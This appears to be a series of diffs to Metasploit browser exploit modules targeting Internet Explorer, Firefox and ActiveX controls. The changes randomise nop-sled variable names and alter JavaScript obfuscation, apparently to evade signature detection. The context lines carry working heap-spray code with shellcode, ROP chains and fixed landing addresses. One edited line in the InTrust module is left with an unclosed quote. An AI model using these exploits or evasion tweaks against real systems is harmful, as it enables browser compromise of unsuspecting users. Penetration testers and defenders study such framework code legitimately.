--- a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
+++ b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
@@ -132,13 +132,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie_heap_spray(my_target, p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     # For IE 6, 7, 8
     js = %Q|
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
     var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

--- a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
+++ b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
@@ -154,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js

--- a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
+++ b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
@@ -207,7 +207,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
-      js_spray.obfuscate
+      js_spray.obfuscate(memory_sensitive: true)
     end
 
     bof = rand_text_alpha(my_target['Offset'])

--- a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
+++ b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
@@ -183,11 +183,13 @@ class MetasploitModule < Msf::Exploit::Remote
     p = get_payload(my_target, cli)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x90"*4, Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js_spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['OffsetShell']});

--- a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb
+++ b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
     js.update_opts(js_heap_spray.opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
     content = %Q|<html>
 <body>
 <script><!--

--- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
+++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
@@ -82,6 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
     j_counter    = rand_text_alpha(rand(30) + 2)
     j_ret        = rand_text_alpha(rand(100) + 1)
     j_junk       = rand_text_alpha(rand(100) + 1)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
 
     # Build out the message
@@ -91,7 +92,8 @@ class MetasploitModule < Msf::Exploit::Remote
 <object classid='clsid:3BFFE033-BF43-11D5-A271-00A024A51325' id='#{inotes6}'></object>
 <script language='javascript'>
 #{j_shellcode} = unescape('#{shellcode}');
-#{j_nops} = unescape('#{nops}');
+#{randnop} = "#{nops}";
+#{j_nops} = unescape(#{randnop});
 #{j_headersize} = 20;
 #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};

--- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb
+++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
@@ -164,6 +164,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Exploit writing tutorial part 11 : Heap Spraying Demystified
   # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
   def get_random_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
@@ -191,7 +192,8 @@ class MetasploitModule < Msf::Exploit::Remote
     var heap_obj = new heapLib.ie(0x10000);
 
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -213,10 +215,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
+
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{t['Offset']});

--- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb
+++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
@@ -250,7 +250,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js = heaplib(js, {:noobfu => true})
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     html = %Q|

--- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
+++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
@@ -168,7 +168,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Obfuscate on demand
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     html = "<html>"

--- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
+++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
@@ -129,6 +129,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Payload in JS format
     code = Rex::Text.to_unescape(code)
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
 
     sploit << [0x41414141].pack("V") # Filler
     sploit << [0x42424242].pack("V") # Filler
@@ -141,7 +143,8 @@ class MetasploitModule < Msf::Exploit::Remote
     spray = <<-JS
     var heap_lib = new heapLib.ie(0x20000);
     var code = unescape("#{code}");
-    var nops = unescape("%u0c0c%u0c0c");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x2000) nops += nops;
     var offset = nops.substring(0, 0x800-0x20);

--- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
+++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
@@ -114,6 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     case my_target
@@ -143,7 +144,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var heap_obj = new heapLib.ie(0x10000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_random_nops}");
+      var #{randnop} = "#{js_random_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset_length = #{my_target['Offset']};
       for (var i=0; i < 0x1000; i++) {
@@ -162,7 +164,8 @@ class MetasploitModule < Msf::Exploit::Remote
       js = %Q|
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

--- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
+++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
@@ -180,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js

--- a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
+++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
@@ -185,7 +185,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js

--- a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
+++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
@@ -119,6 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     case my_target
@@ -148,7 +149,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var heap_obj = new heapLib.ie(0x10000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_random_nops}");
+      var #{randnop} = "#{js_random_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset_length = #{my_target['Offset']};
       for (var i=0; i < 0x1000; i++) {
@@ -167,7 +169,8 @@ class MetasploitModule < Msf::Exploit::Remote
       js = %Q|
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

--- a/modules/exploits/windows/browser/intrust_annotatex_add.rb
+++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb
@@ -221,7 +221,7 @@ class MetasploitModule < Msf::Exploit::Remote
       #JS obfuscation on demand only for IE8
       if datastore['OBFUSCATE']
         js = ::Rex::Exploitation::JSObfu.new(js)
-        js.obfuscate
+        js.obfuscate(memory_sensitive: true)
         main_sym = js.sym('main')
       end
 

--- a/modules/exploits/windows/browser/intrust_annotatex_add.rb
+++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb
@@ -123,12 +123,16 @@ class MetasploitModule < Msf::Exploit::Remote
     obj_name  = rand_text_alpha(rand(100) + 1)
     main_sym  = 'main' #main function name
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
+
     if my_target.name =~ /IE6/ or my_target.name =~ /IE7/
 
       js = <<-EOS
       function heapspray(){
         shellcode = unescape('#{sc}');
-        bigblock = unescape("%u0c0c%u0c0c");
+        #{randnop} = "#{js_nops};
+        bigblock = unescape(#{randnop});
         headersize = 20;
         slackspace = headersize+shellcode.length;
         while (bigblock.length<slackspace){ bigblock+=bigblock; }

--- a/modules/exploits/windows/browser/kazaa_altnet_heap.rb
+++ b/modules/exploits/windows/browser/kazaa_altnet_heap.rb
@@ -74,6 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content =
@@ -81,7 +82,8 @@ class MetasploitModule < Msf::Exploit::Remote
       "<object classid='clsid:DEF37997-D9C9-4A4B-BF3C-88F99EACEEC2' id='#{vname}'></object>\n" +
       "<script language='javascript'>\n" +
       "#{rand1} = unescape('#{shellcode}');\n" +
-      "#{rand2} = unescape('#{nops}');\n" +
+      "#{randnop} = '#{nops}';\n" +
+      "#{rand2} = unescape(#{randnop});\n" +
       "#{rand3} = 20;\n" +
       "#{rand4} = #{rand3}+#{rand1}.length\n" +
       "while (#{rand2}.length<#{rand4}) #{rand2}+=#{rand2};\n" +

--- a/modules/exploits/windows/browser/lpviewer_url.rb
+++ b/modules/exploits/windows/browser/lpviewer_url.rb
@@ -84,7 +84,8 @@ class MetasploitModule < Msf::Exploit::Remote
     try {
       var #{vname} = new ActiveXObject('LPViewer.LPViewer.1');
       var #{rand1} = unescape('#{shellcode}');
-      var #{rand2} = unescape('#{nops}');
+      var #{randnop} = "#{nops}";
+      var #{rand2} = unescape(#{randnop});
       var #{rand3} = 20;
       var #{rand4} = #{rand3} + #{rand1}.length;
       while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};

--- a/modules/exploits/windows/browser/mcafee_mvt_exec.rb
+++ b/modules/exploits/windows/browser/mcafee_mvt_exec.rb
@@ -98,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
     JS
 
     js = ::Rex::Exploitation::JSObfu.new(js)
-    js.obfuscate
+    js.obfuscate(memory_sensitive: true)
 
     html = <<-EOS
     <html>

--- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb
+++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb
@@ -268,7 +268,7 @@ else {
           }
         }
 
-        custom_js = ::Rex::Exploitation::ObfuscateJS.new(custom_js, opts).obfuscate()
+        custom_js = ::Rex::Exploitation::ObfuscateJS.new(custom_js, opts).obfuscate(memory_sensitive: true)
       end
 
     return <<-EOS

--- a/modules/exploits/windows/browser/mozilla_reduceright.rb
+++ b/modules/exploits/windows/browser/mozilla_reduceright.rb
@@ -229,7 +229,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       if datastore['OBFUSCATE']
         js = ::Rex::Exploitation::JSObfu.new(js)
-        js.obfuscate
+        js.obfuscate(memory_sensitive: true)
       end
 
       html = <<-HTML
@@ -314,7 +314,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       if datastore['OBFUSCATE']
         js = ::Rex::Exploitation::JSObfu.new(js)
-        js.obfuscate
+        js.obfuscate(memory_sensitive: true)
       end
 
       js = js.gsub(/^ {4}/, '')

--- a/modules/exploits/windows/browser/mozilla_reduceright.rb
+++ b/modules/exploits/windows/browser/mozilla_reduceright.rb
@@ -146,6 +146,9 @@ class MetasploitModule < Msf::Exploit::Remote
     js_applet = rand_text_alpha(rand(10) + 5)
     a_trigger = rand_text_alpha(rand(10) + 5)
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
+
     if my_target.name =~ /\(JAVA\)/
 
       #mona.py tekniq! + Payload
@@ -199,13 +202,14 @@ class MetasploitModule < Msf::Exploit::Remote
         var nullt    = 0x2/2;
 
         var espoffset  = (7340 /2) - ptrs.length;
-        var esppadding = unescape("%u0c0c%u0c0c");
+        var #{randnop} = "#{js_nops}";
+        var esppadding = unescape(#{randnop});
         while(esppadding.length < espoffset) esppadding += esppadding;
         esppadding = esppadding.substring(0, espoffset);
 
         var payload = unescape("#{js_payload}");
 
-        var tr_padding = unescape("%u0c0c%u0c0c");
+        var tr_padding = unescape(#{randnop});
         while (tr_padding.length < 0x7fa00) {tr_padding += tr_padding;}
 
         var dummy = ptrs + esppadding + payload + tr_padding;
@@ -292,7 +296,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
         var payload = unescape("#{js_payload}");
 
-        var tr_padding = unescape("%u0c0c%u0c0c");
+        var #{randnop} = "#{js_nops}";
+        var tr_padding = unescape(#{randnop});
         while (tr_padding.length < 0x7fa00) {tr_padding += tr_padding;}
 
         var dummy = ptrs + payload + tr_padding;

--- a/modules/exploits/windows/browser/ms05_054_onload.rb
+++ b/modules/exploits/windows/browser/ms05_054_onload.rb
@@ -118,7 +118,7 @@ function heapspray()
   prompt(fillmem, "");
 }
 |
-    heapspray.obfuscate
+    heapspray.obfuscate(memory_sensitive: true)
 
     nofunc = ::Rex::Exploitation::JSObfu.new %Q|
 
@@ -152,7 +152,7 @@ else
 }
 |
 
-    nofunc.obfuscate
+    nofunc.obfuscate(memory_sensitive: true)
 
     main = %Q|
 function #{func_main}()

--- a/modules/exploits/windows/browser/ms05_054_onload.rb
+++ b/modules/exploits/windows/browser/ms05_054_onload.rb
@@ -92,12 +92,14 @@ class MetasploitModule < Msf::Exploit::Remote
     mytarget   = auto_target(cli, request)
     var_title  = rand_text_alpha(rand(100) + 1)
     func_main  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     heapspray = ::Rex::Exploitation::JSObfu.new %Q|
 function heapspray()
 {
   shellcode = unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
-  var bigblock = unescape("#{Rex::Text.to_unescape(make_nops(4))}");
+  var #{randnop} = "#{Rex::Text.to_unescape(make_nops(4))}";
+  var bigblock = unescape(#{randnop});
   var headersize = 20;
   var slackspace = headersize + shellcode.length;
   while (bigblock.length < slackspace) bigblock += bigblock;

--- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb
+++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb
@@ -91,13 +91,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rnd              = rand(2)
     var_setTimeout   = (rnd == 0) ? "setTimeout('#{var_fillHeap}()', 5)" : ""
     var_setInterval  = (rnd == 1) ? "setInterval('#{var_fillHeap}()', 5)" : ""
+    randnop          = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content = %Q|<html>
 <head>
 <script language = "javascript">
 var #{var_payload} = unescape("#{shellcode}");
-var #{var_nopslide} = unescape("#{nops}");
+var #{randnop} = "#{nops}";
+var #{var_nopslide} = unescape(#{randnop});
 var #{var_slidesize} = 20+#{var_payload}.length;
 while (#{var_nopslide}.length<#{var_slidesize}) { #{var_nopslide} += #{var_nopslide}; }
 var #{var_fillblock} = #{var_nopslide}.substring(0,#{var_slidesize});

--- a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb
+++ b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb
@@ -77,13 +77,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|
     <html>
       <object id='#{vname}' classid='clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C'></object>
       <script language="JavaScript">
       var #{rand1} = unescape('#{shellcode}');
-      var #{rand2} = unescape('#{nops}');
+      var #{randnop} = "#{nops}";
+      var #{rand2} = unescape(#{randnop});
       var #{rand3} = 20;
       var #{rand4} = #{rand3} + #{rand1}.length;
       while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};

--- a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb
+++ b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb
@@ -83,6 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rand9  = rand_text_alpha(rand(100) + 1)
     rand10  = rand_text_alpha(rand(100) + 1)
     rand11  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|
 <html>
@@ -93,7 +94,8 @@ class MetasploitModule < Msf::Exploit::Remote
   for (#{var_i}=1;#{var_i}<=2145;#{var_i}++){#{rand3}=#{rand3}+unescape("%0c");}
   var #{rand4} = unescape("#{shellcode}");
   var #{rand5} = (#{rand4}.length * 2);
-  var #{rand6} = unescape("#{nops}");
+  var #{randnop} = "#{nops}";
+  var #{rand6} = unescape(#{randnop});
   var #{rand7} = 0x0c0c0c0c;
   var #{rand8} = 0x100000;
   var #{rand9} = #{rand8} - (#{rand5} + 1);

--- a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb
+++ b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb
@@ -148,7 +148,7 @@ history.go(0);
       }
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
 #<body onload="history.go(0); #{fnname}()">
 
     # Build the final HTML

--- a/modules/exploits/windows/browser/ms10_002_ie_object.rb
+++ b/modules/exploits/windows/browser/ms10_002_ie_object.rb
@@ -120,6 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
     p = get_payload(my_target)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # The exploit will try to take up the freed memory
     # with a fake item before the reuse
@@ -198,7 +199,8 @@ function Start() {
 
   var code = unescape("#{js_code}");
   var memory_layout = unescape("#{memory_layout_js}")
-  var nops = unescape("#{js_nops}");
+  var #{randnop} = "#{js_nops}";
+  var nops = unescape(#{randnop});
   while (nops.length < 0x80000) nops += nops;
   var offset = nops.substring(0, #{my_target['Offset']} - memory_layout.length);
   var shellcode = memory_layout + offset + code + nops.substring(0, 0x800-#{my_target['Offset']}-code.length);

--- a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb
+++ b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb
@@ -178,7 +178,7 @@ function heapspray(){
   }
 }
     |
-    heapspray.obfuscate
+    heapspray.obfuscate(memory_sensitive: true)
 
     # Construct the final page
     case mytarget['Method']

--- a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb
+++ b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb
@@ -189,7 +189,7 @@ EOS
       }
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
-    #js.obfuscate()
+    #js.obfuscate(memory_sensitive: true)
 
     # Construct the final page
     html = <<-EOS

--- a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
+++ b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
@@ -251,7 +251,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     html = <<-HTML

--- a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
+++ b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
@@ -191,6 +191,9 @@ class MetasploitModule < Msf::Exploit::Remote
     code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
     vtable_js = Rex::Text.to_unescape(vtable, Rex::Arch.endian(target.arch))
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+
     #Extract string based on what the setup is
     if mytarget.name == 'Internet Explorer 8 on XP SP3'
       js_extract_str = "var block = shellcode.substring(2, 0x20000-0x21);"
@@ -216,7 +219,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     function heap_spray(heaplib_obj, offset) {
       var code = unescape("#{code_js}");
-      var nops = unescape("%u0c0c%u0c0c");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
 
       while (nops.length < 0x1000) nops += nops;
       offset = nops.substring(0, #{mytarget['Offset']});

--- a/modules/exploits/windows/browser/ms11_081_option.rb
+++ b/modules/exploits/windows/browser/ms11_081_option.rb
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
       @heap_spray_func = js.sym("heap_spray")
     end
 

--- a/modules/exploits/windows/browser/ms11_081_option.rb
+++ b/modules/exploits/windows/browser/ms11_081_option.rb
@@ -96,11 +96,14 @@ class MetasploitModule < Msf::Exploit::Remote
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
 
+    randnop = rand_text_alpha(rand(100) + 1)
+
     js = %Q|
     function heap_spray() {
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

--- a/modules/exploits/windows/browser/ms11_093_ole32.rb
+++ b/modules/exploits/windows/browser/ms11_093_ole32.rb
@@ -143,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js_pivot = ::Rex::Exploitation::JSObfu.new(js_pivot)
-      js_pivot.obfuscate
+      js_pivot.obfuscate(memory_sensitive: true)
     end
 
     vsd_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource

--- a/modules/exploits/windows/browser/ms11_093_ole32.rb
+++ b/modules/exploits/windows/browser/ms11_093_ole32.rb
@@ -120,11 +120,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js_pivot = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});

--- a/modules/exploits/windows/browser/ms12_004_midi.rb
+++ b/modules/exploits/windows/browser/ms12_004_midi.rb
@@ -338,6 +338,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     shellcode = Rex::Text.to_unescape(code)
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
+
     # 1. Create  big block of nops
     # 2. Compose one block which is nops + shellcode
     # 3. Repeat the block
@@ -347,7 +350,8 @@ class MetasploitModule < Msf::Exploit::Remote
     var heap_obj = new heapLib.ie(0x10000);
 
     var code = unescape("#{shellcode}");
-    var nops = unescape("%u0c0c%u0c0c");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x1000) nops+= nops;
     var shellcode =  nops.substring(0,0x800 - code.length) + code;

--- a/modules/exploits/windows/browser/ms12_004_midi.rb
+++ b/modules/exploits/windows/browser/ms12_004_midi.rb
@@ -272,9 +272,9 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if datastore['OBFUSCATE']
-      spray   = ::Rex::Exploitation::JSObfu.new(spray).obfuscate
+      spray   = ::Rex::Exploitation::JSObfu.new(spray).obfuscate(memory_sensitive: true)
       trigger = ::Rex::Exploitation::JSObfu.new(trigger)
-      trigger.obfuscate
+      trigger.obfuscate(memory_sensitive: true)
       trigger_fn = trigger.sym('trigger')
     else
       trigger_fn = 'trigger'

--- a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
+++ b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
@@ -248,7 +248,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       spray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js)
-      spray_trigger_js.obfuscate
+      spray_trigger_js.obfuscate(memory_sensitive: true)
     end
 
     # build html

--- a/modules/exploits/windows/browser/ms12_037_same_id.rb
+++ b/modules/exploits/windows/browser/ms12_037_same_id.rb
@@ -195,7 +195,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
-      js_spray.obfuscate
+      js_spray.obfuscate(memory_sensitive: true)
 
       trigger_f = rand_text_alpha(rand(5) + 4)
       feng_shui_f = rand_text_alpha(rand(5) + 4)

--- a/modules/exploits/windows/browser/ms12_037_same_id.rb
+++ b/modules/exploits/windows/browser/ms12_037_same_id.rb
@@ -160,13 +160,15 @@ class MetasploitModule < Msf::Exploit::Remote
     js_padding = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(my_target.arch))
     js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js_spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
     var rop_chain = unescape("#{js_rop}");
     var random = unescape("#{js_padding}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (random.length < 0x80000) random += random;
     while (nops.length < 0x80000) nops += nops;

--- a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
+++ b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
@@ -107,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
